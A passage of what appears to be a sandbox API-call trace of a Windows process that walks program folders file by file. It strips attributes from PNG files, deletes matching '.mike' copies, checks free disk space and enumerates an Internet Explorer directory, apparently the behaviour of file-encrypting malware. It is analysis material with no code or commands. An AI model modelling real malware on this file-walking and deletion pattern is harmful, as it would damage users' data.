files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0066.771] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.775] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0066.776] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_buttongraphic.png.mike")) returned 1 [0066.778] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.782] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0066.783] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_selectionsubpicture.png.mike")) returned 1 [0066.785] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.789] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0066.790] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_buttongraphic.png.mike")) returned 1 [0066.792] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.797] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0066.798] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_selectionsubpicture.png.mike")) returned 1 [0066.799] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.805] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png", dwFileAttributes=0x80) returned 0 [0066.805] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\softedges.png.mike")) returned 1 [0066.807] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.816] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png", dwFileAttributes=0x80) returned 0 [0066.817] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\vignettemask25.png.mike")) returned 1 [0066.818] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.822] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png", dwFileAttributes=0x80) returned 0 [0066.823] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\whiteband.png.mike")) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf11f7a60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xf11f7a60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8e3932, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8e3932, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="softedges.png", cAlternateFileName="")) returned 1 [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdcdf, dwReserved0=0x0, dwReserved1=0x0, cFileName="vignettemask25.png", cAlternateFileName="")) returned 1 [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="whiteband.png", cAlternateFileName="")) returned 1 [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="whiteband.png", cAlternateFileName="")) returned 0 [0066.825] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.825] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.825] CoTaskMemFree (pv=0x506980) [0066.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f55643f, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5f55643f, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x23ff2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9a30bbb, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0xb9a30bbb, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0xb9a30bbb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0x0, dwReserved1=0x0, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37b6f98, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37dd0f9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x41e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdecd4578, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xdecd4578, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xe3cb04e0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3803259, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3803259, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa3803259, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa387567a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa387567a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa387567a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9b10, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3686496, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3686496, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54abd0a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe54abd0a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b495380, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x23600, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41a0e8a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe41a0e8a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b4b9d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20400, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36ac5f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa36ac5f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x46400, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x825d0f8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0x825d0f8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0x5909b005, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x579f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0066.827] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594eb7ab, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x594eb7ab, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x439e9300, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x83200, dwReserved0=0x0, dwReserved1=0x0, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0066.827] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0066.827] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0066.827] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.827] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f55643f, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5f55643f, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x23ff2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9a30bbb, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0xb9a30bbb, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0xb9a30bbb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0x0, dwReserved1=0x0, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, 